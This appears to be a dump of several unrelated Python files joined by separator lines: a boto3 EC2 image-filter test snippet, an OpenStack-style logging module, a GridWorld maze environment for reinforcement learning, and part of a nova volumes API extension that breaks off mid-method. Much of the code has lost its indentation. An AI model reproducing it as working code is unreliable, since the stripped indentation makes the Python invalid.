ec2 = boto3.resource('ec2', region_name='us-west-1')
instance = ec2.create_instances(ImageId='ami-1234abcd', MinCount=1, MaxCount=1)[0]
image = instance.create_image(Name='test-image')
filter_result = list(ec2.images.filter(Owners=['111122223333'], Filters=[{'Name':'name', 'Values':['test*']}]))
assert filter_result == [image]
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Openstack logging handler.
This module adds to logging functionality by adding the option to specify
a context object when calling the various log methods. If the context object
is not specified, default formatting is used. Additionally, an instance uuid
may be passed as part of the log message, which is intended to make it easier
for admins to find messages related to a specific instance.
It also allows setting of formatting information through conf.
"""
import ConfigParser
import cStringIO
import inspect
import itertools
import logging
import logging.config
import logging.handlers
import os
import sys
import traceback
from oslo.config import cfg
from sarlacc.openstack.common.gettextutils import _
from sarlacc.openstack.common import importutils
from sarlacc.openstack.common import jsonutils
from sarlacc.openstack.common import local
_DEFAULT_LOG_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
common_cli_opts = [
cfg.BoolOpt('debug',
short='d',
default=False,
help='Print debugging output (set logging level to '
'DEBUG instead of default WARNING level).'),
cfg.BoolOpt('verbose',
short='v',
default=False,
help='Print more verbose output (set logging level to '
'INFO instead of default WARNING level).'),
]
logging_cli_opts = [
cfg.StrOpt('log-config',
metavar='PATH',
help='If this option is specified, the logging configuration '
'file specified is used and overrides any other logging '
'options specified. Please see the Python logging module '
'documentation for details on logging configuration '
'files.'),
cfg.StrOpt('log-format',
default=None,
metavar='FORMAT',
help='A logging.Formatter log message format string which may '
'use any of the available logging.LogRecord attributes. '
'This option is deprecated. Please use '
'logging_context_format_string and '
'logging_default_format_string instead.'),
cfg.StrOpt('log-date-format',
default=_DEFAULT_LOG_DATE_FORMAT,
metavar='DATE_FORMAT',
help='Format string for %%(asctime)s in log records. '
'Default: %(default)s'),
cfg.StrOpt('log-file',
metavar='PATH',
deprecated_name='logfile',
help='(Optional) Name of log file to output to. '
'If no default is set, logging will go to stdout.'),
cfg.StrOpt('log-dir',
deprecated_name='logdir',
help='(Optional) The base directory used for relative '
'--log-file paths'),
cfg.BoolOpt('use-syslog',
default=False,
help='Use syslog for logging.'),
cfg.StrOpt('syslog-log-facility',
default='LOG_USER',
help='syslog facility to receive log lines')
]
generic_log_opts = [
cfg.BoolOpt('use_stderr',
default=True,
help='Log output to standard error')
]
log_opts = [
cfg.StrOpt('logging_context_format_string',
default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
'%(name)s [%(request_id)s %(user)s %(tenant)s] '
'%(instance)s%(message)s',
help='format string to use for log messages with context'),
cfg.StrOpt('logging_default_format_string',
default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
'%(name)s [-] %(instance)s%(message)s',
help='format string to use for log messages without context'),
cfg.StrOpt('logging_debug_format_suffix',
default='%(funcName)s %(pathname)s:%(lineno)d',
help='data to append to log format when level is DEBUG'),
cfg.StrOpt('logging_exception_prefix',
default='%(asctime)s.%(msecs)03d %(process)d TRACE %(name)s '
'%(instance)s',
help='prefix each line of exception output with this format'),
cfg.ListOpt('default_log_levels',
default=[
'amqplib=WARN',
'sqlalchemy=WARN',
'boto=WARN',
'suds=INFO',
'keystone=INFO',
'eventlet.wsgi.server=WARN'
],
help='list of logger=LEVEL pairs'),
cfg.BoolOpt('publish_errors',
default=False,
help='publish error events'),
cfg.BoolOpt('fatal_deprecations',
default=False,
help='make deprecations fatal'),
# NOTE(mikal): there are two options here because sometimes we are handed
# a full instance (and could include more information), and other times we
# are just handed a UUID for the instance.
cfg.StrOpt('instance_format',
default='[instance: %(uuid)s] ',
help='If an instance is passed with the log message, format '
'it like this'),
cfg.StrOpt('instance_uuid_format',
default='[instance: %(uuid)s] ',
help='If an instance UUID is passed with the log message, '
'format it like this'),
]
CONF = cfg.CONF
CONF.register_cli_opts(common_cli_opts)
CONF.register_cli_opts(logging_cli_opts)
CONF.register_opts(generic_log_opts)
CONF.register_opts(log_opts)
# our new audit level
# NOTE(jkoelker) Since we synthesized an audit level, make the logging
# module aware of it so it acts like other levels.
logging.AUDIT = logging.INFO + 1
logging.addLevelName(logging.AUDIT, 'AUDIT')
try:
NullHandler = logging.NullHandler
except AttributeError: # NOTE(jkoelker) NullHandler added in Python 2.7
class NullHandler(logging.Handler):
def handle(self, record):
pass
def emit(self, record):
pass
def createLock(self):
self.lock = None
def _dictify_context(context):
if context is None:
return None
if not isinstance(context, dict) and getattr(context, 'to_dict', None):
context = context.to_dict()
return context
def _get_binary_name():
return os.path.basename(inspect.stack()[-1][1])
def _get_log_file_path(binary=None):
logfile = CONF.log_file
logdir = CONF.log_dir
if logfile and not logdir:
return logfile
if logfile and logdir:
return os.path.join(logdir, logfile)
if logdir:
binary = binary or _get_binary_name()
return '%s.log' % (os.path.join(logdir, binary),)
class BaseLoggerAdapter(logging.LoggerAdapter):
def audit(self, msg, *args, **kwargs):
self.log(logging.AUDIT, msg, *args, **kwargs)
class LazyAdapter(BaseLoggerAdapter):
def __init__(self, name='unknown', version='unknown'):
self._logger = None
self.extra = {}
self.name = name
self.version = version
@property
def logger(self):
if not self._logger:
self._logger = getLogger(self.name, self.version)
return self._logger
class ContextAdapter(BaseLoggerAdapter):
warn = logging.LoggerAdapter.warning
def __init__(self, logger, project_name, version_string):
self.logger = logger
self.project = project_name
self.version = version_string
@property
def handlers(self):
return self.logger.handlers
def deprecated(self, msg, *args, **kwargs):
stdmsg = _("Deprecated: %s") % msg
if CONF.fatal_deprecations:
self.critical(stdmsg, *args, **kwargs)
raise DeprecatedConfig(msg=stdmsg)
else:
self.warn(stdmsg, *args, **kwargs)
def process(self, msg, kwargs):
if 'extra' not in kwargs:
kwargs['extra'] = {}
extra = kwargs['extra']
context = kwargs.pop('context', None)
if not context:
context = getattr(local.store, 'context', None)
if context:
extra.update(_dictify_context(context))
instance = kwargs.pop('instance', None)
instance_extra = ''
if instance:
instance_extra = CONF.instance_format % instance
else:
instance_uuid = kwargs.pop('instance_uuid', None)
if instance_uuid:
instance_extra = (CONF.instance_uuid_format
% {'uuid': instance_uuid})
extra.update({'instance': instance_extra})
extra.update({"project": self.project})
extra.update({"version": self.version})
extra['extra'] = extra.copy()
return msg, kwargs
class JSONFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
        # NOTE(jkoelker) we ignore the fmt argument, but it's still there
        # since logging.config.fileConfig passes it.
self.datefmt = datefmt
def formatException(self, ei, strip_newlines=True):
lines = traceback.format_exception(*ei)
if strip_newlines:
lines = [itertools.ifilter(
lambda x: x,
line.rstrip().splitlines()) for line in lines]
lines = list(itertools.chain(*lines))
return lines
def format(self, record):
message = {'message': record.getMessage(),
'asctime': self.formatTime(record, self.datefmt),
'name': record.name,
'msg': record.msg,
'args': record.args,
'levelname': record.levelname,
'levelno': record.levelno,
'pathname': record.pathname,
'filename': record.filename,
'module': record.module,
'lineno': record.lineno,
'funcname': record.funcName,
'created': record.created,
'msecs': record.msecs,
'relative_created': record.relativeCreated,
'thread': record.thread,
'thread_name': record.threadName,
'process_name': record.processName,
'process': record.process,
'traceback': None}
if hasattr(record, 'extra'):
message['extra'] = record.extra
if record.exc_info:
message['traceback'] = self.formatException(record.exc_info)
return jsonutils.dumps(message)
def _create_logging_excepthook(product_name):
def logging_excepthook(type, value, tb):
extra = {}
if CONF.verbose:
extra['exc_info'] = (type, value, tb)
getLogger(product_name).critical(str(value), **extra)
return logging_excepthook
class LogConfigError(Exception):
message = _('Error loading logging config %(log_config)s: %(err_msg)s')
def __init__(self, log_config, err_msg):
self.log_config = log_config
self.err_msg = err_msg
def __str__(self):
return self.message % dict(log_config=self.log_config,
err_msg=self.err_msg)
def _load_log_config(log_config):
try:
logging.config.fileConfig(log_config)
except ConfigParser.Error as exc:
raise LogConfigError(log_config, str(exc))
def setup(product_name):
"""Setup logging."""
if CONF.log_config:
_load_log_config(CONF.log_config)
else:
_setup_logging_from_conf()
sys.excepthook = _create_logging_excepthook(product_name)
def set_defaults(logging_context_format_string):
cfg.set_defaults(log_opts,
logging_context_format_string=
logging_context_format_string)
def _find_facility_from_conf():
facility_names = logging.handlers.SysLogHandler.facility_names
facility = getattr(logging.handlers.SysLogHandler,
CONF.syslog_log_facility,
None)
if facility is None and CONF.syslog_log_facility in facility_names:
facility = facility_names.get(CONF.syslog_log_facility)
if facility is None:
valid_facilities = facility_names.keys()
        consts = ['LOG_AUTH', 'LOG_AUTHPRIV', 'LOG_CRON', 'LOG_DAEMON',
                  'LOG_FTP', 'LOG_KERN', 'LOG_LPR', 'LOG_MAIL', 'LOG_NEWS',
                  'LOG_SYSLOG', 'LOG_USER', 'LOG_UUCP',
                  'LOG_LOCAL0', 'LOG_LOCAL1', 'LOG_LOCAL2', 'LOG_LOCAL3',
                  'LOG_LOCAL4', 'LOG_LOCAL5', 'LOG_LOCAL6', 'LOG_LOCAL7']
valid_facilities.extend(consts)
raise TypeError(_('syslog facility must be one of: %s') %
', '.join("'%s'" % fac
for fac in valid_facilities))
return facility
def _setup_logging_from_conf():
log_root = getLogger(None).logger
for handler in log_root.handlers:
log_root.removeHandler(handler)
if CONF.use_syslog:
facility = _find_facility_from_conf()
syslog = logging.handlers.SysLogHandler(address='/dev/log',
facility=facility)
log_root.addHandler(syslog)
logpath = _get_log_file_path()
if logpath:
filelog = logging.handlers.WatchedFileHandler(logpath)
log_root.addHandler(filelog)
if CONF.use_stderr:
streamlog = ColorHandler()
log_root.addHandler(streamlog)
elif not CONF.log_file:
# pass sys.stdout as a positional argument
# python2.6 calls the argument strm, in 2.7 it's stream
streamlog = logging.StreamHandler(sys.stdout)
log_root.addHandler(streamlog)
if CONF.publish_errors:
handler = importutils.import_object(
"sarlacc.openstack.common.log_handler.PublishErrorsHandler",
logging.ERROR)
log_root.addHandler(handler)
datefmt = CONF.log_date_format
for handler in log_root.handlers:
# NOTE(alaski): CONF.log_format overrides everything currently. This
# should be deprecated in favor of context aware formatting.
if CONF.log_format:
handler.setFormatter(logging.Formatter(fmt=CONF.log_format,
datefmt=datefmt))
log_root.info('Deprecated: log_format is now deprecated and will '
'be removed in the next release')
else:
handler.setFormatter(ContextFormatter(datefmt=datefmt))
if CONF.debug:
log_root.setLevel(logging.DEBUG)
elif CONF.verbose:
log_root.setLevel(logging.INFO)
else:
log_root.setLevel(logging.WARNING)
for pair in CONF.default_log_levels:
mod, _sep, level_name = pair.partition('=')
level = logging.getLevelName(level_name)
logger = logging.getLogger(mod)
logger.setLevel(level)
_loggers = {}
def getLogger(name='unknown', version='unknown'):
if name not in _loggers:
_loggers[name] = ContextAdapter(logging.getLogger(name),
name,
version)
return _loggers[name]
def getLazyLogger(name='unknown', version='unknown'):
"""Returns lazy logger.
Creates a pass-through logger that does not create the real logger
until it is really needed and delegates all calls to the real logger
once it is created.
"""
return LazyAdapter(name, version)
class WritableLogger(object):
"""A thin wrapper that responds to `write` and logs."""
def __init__(self, logger, level=logging.INFO):
self.logger = logger
self.level = level
def write(self, msg):
self.logger.log(self.level, msg)
class ContextFormatter(logging.Formatter):
"""A context.RequestContext aware formatter configured through flags.
The flags used to set format strings are: logging_context_format_string
and logging_default_format_string. You can also specify
logging_debug_format_suffix to append extra formatting if the log level is
debug.
For information about what variables are available for the formatter see:
http://docs.python.org/library/logging.html#formatter
"""
def format(self, record):
"""Uses contextstring if request_id is set, otherwise default."""
        # NOTE(sdague): default the fancier formatting params
# to an empty string so we don't throw an exception if
# they get used
for key in ('instance', 'color'):
if key not in record.__dict__:
record.__dict__[key] = ''
if record.__dict__.get('request_id', None):
self._fmt = CONF.logging_context_format_string
else:
self._fmt = CONF.logging_default_format_string
if (record.levelno == logging.DEBUG and
CONF.logging_debug_format_suffix):
self._fmt += " " + CONF.logging_debug_format_suffix
        # Cache this on the record, Logger will respect our formatted copy
if record.exc_info:
record.exc_text = self.formatException(record.exc_info, record)
return logging.Formatter.format(self, record)
def formatException(self, exc_info, record=None):
"""Format exception output with CONF.logging_exception_prefix."""
if not record:
return logging.Formatter.formatException(self, exc_info)
stringbuffer = cStringIO.StringIO()
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2],
None, stringbuffer)
lines = stringbuffer.getvalue().split('\n')
stringbuffer.close()
if CONF.logging_exception_prefix.find('%(asctime)') != -1:
record.asctime = self.formatTime(record, self.datefmt)
formatted_lines = []
for line in lines:
pl = CONF.logging_exception_prefix % record.__dict__
fl = '%s%s' % (pl, line)
formatted_lines.append(fl)
return '\n'.join(formatted_lines)
class ColorHandler(logging.StreamHandler):
LEVEL_COLORS = {
logging.DEBUG: '\033[00;32m', # GREEN
logging.INFO: '\033[00;36m', # CYAN
logging.AUDIT: '\033[01;36m', # BOLD CYAN
logging.WARN: '\033[01;33m', # BOLD YELLOW
logging.ERROR: '\033[01;31m', # BOLD RED
logging.CRITICAL: '\033[01;31m', # BOLD RED
}
def format(self, record):
record.color = self.LEVEL_COLORS[record.levelno]
return logging.StreamHandler.format(self, record)
class DeprecatedConfig(Exception):
message = _("Fatal call to deprecated config: %(msg)s")
def __init__(self, msg):
super(Exception, self).__init__(self.message % dict(msg=msg))
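# Illustrative usage sketch (assumes CONF has already been populated, e.g.
# from the command line; the import path mirrors this module's location):
#
#   from sarlacc.openstack.common import log as logging
#
#   logging.setup('sarlacc')           # installs handlers according to CONF
#   LOG = logging.getLogger(__name__)
#   LOG.audit('service started')       # AUDIT level registered above
#   LOG.info('request handled', context=ctx)  # `ctx` is an assumed
#                                             # RequestContext-like object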
|
|
import numpy as np
from ..utils import check_random_state
# Maze state is represented as a 2-element NumPy array: (Y, X). Increasing Y is South.
# Possible actions, expressed as (delta-y, delta-x).
maze_actions = {
'N': np.array([-1, 0]),
'S': np.array([1, 0]),
'E': np.array([0, 1]),
'W': np.array([0, -1]),
}
def parse_topology(topology):
return np.array([list(row) for row in topology])
class Maze(object):
"""
Simple wrapper around a NumPy 2D array to handle flattened indexing and staying in bounds.
"""
def __init__(self, topology):
self.topology = parse_topology(topology)
self.flat_topology = self.topology.ravel()
self.shape = self.topology.shape
def in_bounds_flat(self, position):
        return 0 <= position < np.prod(self.shape)
def in_bounds_unflat(self, position):
return 0 <= position[0] < self.shape[0] and 0 <= position[1] < self.shape[1]
def get_flat(self, position):
if not self.in_bounds_flat(position):
raise IndexError("Position out of bounds: {}".format(position))
return self.flat_topology[position]
def get_unflat(self, position):
if not self.in_bounds_unflat(position):
raise IndexError("Position out of bounds: {}".format(position))
return self.topology[tuple(position)]
def flatten_index(self, index_tuple):
return np.ravel_multi_index(index_tuple, self.shape)
def unflatten_index(self, flattened_index):
return np.unravel_index(flattened_index, self.shape)
def flat_positions_containing(self, x):
return list(np.nonzero(self.flat_topology == x)[0])
def flat_positions_not_containing(self, x):
return list(np.nonzero(self.flat_topology != x)[0])
def __str__(self):
return '\n'.join(''.join(row) for row in self.topology.tolist())
def __repr__(self):
return 'Maze({})'.format(repr(self.topology.tolist()))
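# Illustrative sketch (uses the `samples` mazes defined near the bottom of
# this module): flat and unflat indexing agree.
#
#   m = Maze(samples['trivial'])
#   m.shape                   # (5, 3)
#   m.flatten_index((1, 1))   # 4 -- the 'o' cell
#   m.get_flat(4)             # 'o'
#   m.unflatten_index(4)      # (1, 1)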
def move_avoiding_walls(maze, position, action):
"""
Return the new position after moving, and the event that happened ('hit-wall' or 'moved').
Works with the position and action as a (row, column) array.
"""
# Compute new position
new_position = position + action
# Compute collisions with walls, including implicit walls at the ends of the world.
if not maze.in_bounds_unflat(new_position) or maze.get_unflat(new_position) == '#':
return position, 'hit-wall'
return new_position, 'moved'
class GridWorld(object):
"""
A simple task in a maze: get to the goal.
Parameters
----------
maze : list of strings or lists
maze topology (see below)
rewards: dict of string to number. default: {'*': 10}.
Rewards obtained by being in a maze grid with the specified contents,
or experiencing the specified event (either 'hit-wall' or 'moved'). The
contributions of content reward and event reward are summed. For
example, you might specify a cost for moving by passing
rewards={'*': 10, 'moved': -1}.
terminal_markers: sequence of chars, default '*'
A grid cell containing any of these markers will be considered a
"terminal" state.
action_error_prob: float
With this probability, the requested action is ignored and a random
action is chosen instead.
random_state: None, int, or RandomState object
For repeatable experiments, you can pass a random state here. See
http://scikit-learn.org/stable/modules/generated/sklearn.utils.check_random_state.html
Notes
-----
Maze topology is expressed textually. Key:
'#': wall
'.': open (really, anything that's not '#')
'*': goal
'o': origin
"""
def __init__(self, maze, rewards={'*': 10}, terminal_markers='*', action_error_prob=0, random_state=None, directions="NSEW"):
self.maze = Maze(maze) if not isinstance(maze, Maze) else maze
self.rewards = rewards
self.terminal_markers = terminal_markers
self.action_error_prob = action_error_prob
self.random_state = check_random_state(random_state)
self.actions = [maze_actions[direction] for direction in directions]
self.num_actions = len(self.actions)
self.state = None
self.reset()
self.num_states = self.maze.shape[0] * self.maze.shape[1]
def __repr__(self):
return 'GridWorld(maze={maze!r}, rewards={rewards}, terminal_markers={terminal_markers}, action_error_prob={action_error_prob})'.format(**self.__dict__)
def reset(self):
"""
Reset the position to a starting position (an 'o'), chosen at random.
"""
options = self.maze.flat_positions_containing('o')
self.state = options[self.random_state.choice(len(options))]
def is_terminal(self, state):
"""Check if the given state is a terminal state."""
return self.maze.get_flat(state) in self.terminal_markers
def observe(self):
"""
Return the current state as an integer.
The state is the index into the flattened maze.
"""
return self.state
def perform_action(self, action_idx):
"""Perform an action (specified by index), yielding a new state and reward."""
# In the absorbing end state, nothing does anything.
if self.is_terminal(self.state):
return self.observe(), 0
if self.action_error_prob and self.random_state.rand() < self.action_error_prob:
action_idx = self.random_state.choice(self.num_actions)
action = self.actions[action_idx]
new_state_tuple, result = move_avoiding_walls(self.maze, self.maze.unflatten_index(self.state), action)
self.state = self.maze.flatten_index(new_state_tuple)
reward = self.rewards.get(self.maze.get_flat(self.state), 0) + self.rewards.get(result, 0)
return self.observe(), reward
def as_mdp(self):
transition_probabilities = np.zeros((self.num_states, self.num_actions, self.num_states))
rewards = np.zeros((self.num_states, self.num_actions, self.num_states))
action_rewards = np.zeros((self.num_states, self.num_actions))
destination_rewards = np.zeros(self.num_states)
for state in range(self.num_states):
destination_rewards[state] = self.rewards.get(self.maze.get_flat(state), 0)
        is_terminal_state = np.zeros(self.num_states, dtype=bool)  # np.bool is deprecated/removed in recent NumPy
for state in range(self.num_states):
if self.is_terminal(state):
is_terminal_state[state] = True
transition_probabilities[state, :, state] = 1.
else:
for action in range(self.num_actions):
new_state_tuple, result = move_avoiding_walls(self.maze, self.maze.unflatten_index(state), self.actions[action])
new_state = self.maze.flatten_index(new_state_tuple)
transition_probabilities[state, action, new_state] = 1.
action_rewards[state, action] = self.rewards.get(result, 0)
# Now account for action noise.
transitions_given_random_action = transition_probabilities.mean(axis=1, keepdims=True)
transition_probabilities *= (1 - self.action_error_prob)
transition_probabilities += self.action_error_prob * transitions_given_random_action
rewards_given_random_action = action_rewards.mean(axis=1, keepdims=True)
action_rewards = (1 - self.action_error_prob) * action_rewards + self.action_error_prob * rewards_given_random_action
rewards = action_rewards[:, :, None] + destination_rewards[None, None, :]
rewards[is_terminal_state] = 0
return transition_probabilities, rewards
def get_max_reward(self):
transition_probabilities, rewards = self.as_mdp()
return rewards.max()
### Old API, where terminal states were None.
def observe_old(self):
return None if self.is_terminal(self.state) else self.state
def perform_action_old(self, action_idx):
new_state, reward = self.perform_action(action_idx)
if self.is_terminal(new_state):
return None, reward
else:
return new_state, reward
samples = {
'trivial': [
'###',
'#o#',
'#.#',
'#*#',
'###'],
'larger': [
'#########',
'#..#....#',
'#..#..#.#',
'#..#..#.#',
'#..#.##.#',
'#....*#.#',
'#######.#',
'#o......#',
'#########']
}
def construct_cliff_task(width, height, goal_reward=50, move_reward=-1, cliff_reward=-100, **kw):
"""
Construct a 'cliff' task, a GridWorld with a "cliff" between the start and
goal. Falling off the cliff gives a large negative reward and ends the
episode.
Any other parameters, like action_error_prob, are passed on to the
GridWorld constructor.
"""
    maze = ['.' * width] * (height - 1)          # open region above the cliff
    maze.append('o' + 'X' * (width - 2) + '*')   # bottom row: origin, cliff ('X'), goal
rewards = {
'*': goal_reward,
'moved': move_reward,
'hit-wall': move_reward,
'X': cliff_reward
}
return GridWorld(maze, rewards=rewards, terminal_markers='*X', **kw)
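# A minimal usage sketch (illustrative; the helper name is hypothetical and not
# part of the original module): build the cliff task, run a short random-policy
# episode, and extract the MDP tensors.
def _demo_cliff_task():
    task = construct_cliff_task(width=6, height=4, action_error_prob=0.1, random_state=0)
    total_reward = 0
    for _ in range(20):
        action_idx = task.random_state.choice(task.num_actions)
        state, reward = task.perform_action(action_idx)
        total_reward += reward
        if task.is_terminal(state):
            break
    # transition_probabilities has shape (num_states, num_actions, num_states);
    # rewards has the same shape and already accounts for action noise.
    transition_probabilities, rewards = task.as_mdp()
    return total_reward, transition_probabilities, rewards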
|
|
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes extension."""
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova import utils
from nova import volume
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'volumes')
authorize_attach = extensions.extension_authorizer('compute',
'volume_attachments')
def _translate_volume_detail_view(context, vol):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availabilityZone'] = vol['availability_zone']
d['createdAt'] = vol['created_at']
if vol['attach_status'] == 'attached':
d['attachments'] = [_translate_attachment_detail_view(vol['id'],
vol['instance_uuid'],
vol['mountpoint'])]
else:
d['attachments'] = [{}]
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volumeType'] = vol['volume_type']['name']
else:
d['volumeType'] = vol['volume_type_id']
d['snapshotId'] = vol['snapshot_id']
LOG.audit(_("vol=%s"), vol, context=context)
if vol.get('volume_metadata'):
metadata = vol.get('volume_metadata')
d['metadata'] = dict((item['key'], item['value']) for item in metadata)
else:
d['metadata'] = {}
return d
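# For illustration (a sketch, not output from a real deployment): a detached
# volume translates to roughly
#
#     {'id': 'vol-id', 'status': 'available', 'size': 1,
#      'availabilityZone': 'nova', 'createdAt': <datetime>,
#      'attachments': [{}], 'displayName': 'myvol',
#      'displayDescription': None, 'volumeType': None,
#      'snapshotId': None, 'metadata': {}}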
def make_volume(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('availabilityZone')
elem.set('createdAt')
elem.set('displayName')
elem.set('displayDescription')
elem.set('volumeType')
elem.set('snapshotId')
attachments = xmlutil.SubTemplateElement(elem, 'attachments')
attachment = xmlutil.SubTemplateElement(attachments, 'attachment',
selector='attachments')
make_attachment(attachment)
# Attach metadata node
elem.append(common.MetadataTemplate())
class VolumeTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volume', selector='volume')
make_volume(root)
return xmlutil.MasterTemplate(root, 1)
class VolumesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumes')
elem = xmlutil.SubTemplateElement(root, 'volume', selector='volumes')
make_volume(elem)
return xmlutil.MasterTemplate(root, 1)
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_volume(self, node):
"""Marshal the volume attribute of a parsed request."""
vol = {}
volume_node = self.find_first_child_named(node, 'volume')
attributes = ['display_name', 'display_description', 'size',
'volume_type', 'availability_zone']
for attr in attributes:
if volume_node.getAttribute(attr):
vol[attr] = volume_node.getAttribute(attr)
metadata_node = self.find_first_child_named(volume_node, 'metadata')
if metadata_node is not None:
vol['metadata'] = self.extract_metadata(metadata_node)
return vol
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted create volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
def default(self, string):
"""Deserialize an xml-formatted volume create request."""
dom = xmlutil.safe_minidom_parse_string(string)
vol = self._extract_volume(dom)
return {'body': {'volume': vol}}
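# An illustrative request body for CreateDeserializer (values and the exact
# metadata element layout are assumptions):
#
#     <volume display_name="vol1" size="1">
#         <metadata><meta key="purpose">test</meta></metadata>
#     </volume>
#
# which deserializes to
#     {'body': {'volume': {'display_name': 'vol1', 'size': '1',
#                          'metadata': {'purpose': 'test'}}}}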
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(VolumeController, self).__init__()
@wsgi.serializers(xml=VolumeTemplate)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return {'volume': _translate_volume_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
authorize(context)
LOG.audit(_("Delete volume with id: %s"), id, context=context)
try:
vol = self.volume_api.get(context, id)
self.volume_api.delete(context, vol)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=VolumesTemplate)
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@wsgi.serializers(xml=VolumesTemplate)
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
volumes = self.volume_api.get_all(context)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
@wsgi.serializers(xml=VolumeTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new volume."""
context = req.environ['nova.context']
authorize(context)
if not self.is_valid_body(body, 'volume'):
raise exc.HTTPUnprocessableEntity()
vol = body['volume']
vol_type = vol.get('volume_type', None)
metadata = vol.get('metadata', None)
snapshot_id = vol.get('snapshot_id')
if snapshot_id is not None:
snapshot = self.volume_api.get_snapshot(context, snapshot_id)
else:
snapshot = None
size = vol.get('size', None)
if size is None and snapshot is not None:
size = snapshot['volume_size']
LOG.audit(_("Create volume of %s GB"), size, context=context)
availability_zone = vol.get('availability_zone', None)
new_volume = self.volume_api.create(context,
size,
vol.get('display_name'),
vol.get('display_description'),
snapshot=snapshot,
volume_type=vol_type,
metadata=metadata,
availability_zone=availability_zone
)
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume))
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _translate_attachment_detail_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(volume_id,
instance_uuid,
mountpoint)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment summary view."""
d = {}
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volumeId'] = volume_id
d['serverId'] = instance_uuid
if mountpoint:
d['device'] = mountpoint
return d
def make_attachment(elem):
elem.set('id')
elem.set('serverId')
elem.set('volumeId')
elem.set('device')
class VolumeAttachmentTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumeAttachment',
selector='volumeAttachment')
make_attachment(root)
return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumeAttachments')
elem = xmlutil.SubTemplateElement(root, 'volumeAttachment',
selector='volumeAttachments')
make_attachment(elem)
return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentController(wsgi.Controller):
"""The volume attachment API controller for the OpenStack API.
A child resource of the server. Note that we use the volume id
as the ID of the attachment (though this is not guaranteed externally)
"""
def __init__(self):
self.compute_api = compute.API()
self.volume_api = volume.API()
super(VolumeAttachmentController, self).__init__()
@wsgi.serializers(xml=VolumeAttachmentsTemplate)
def index(self, req, server_id):
"""Returns the list of volume attachments for a given instance."""
context = req.environ['nova.context']
authorize_attach(context, action='index')
return self._items(req, server_id,
entity_maker=_translate_attachment_summary_view)
@wsgi.serializers(xml=VolumeAttachmentTemplate)
def show(self, req, server_id, id):
"""Return data about the given volume attachment."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='show')
volume_id = id
try:
instance = self.compute_api.get(context, server_id)
except exception.NotFound:
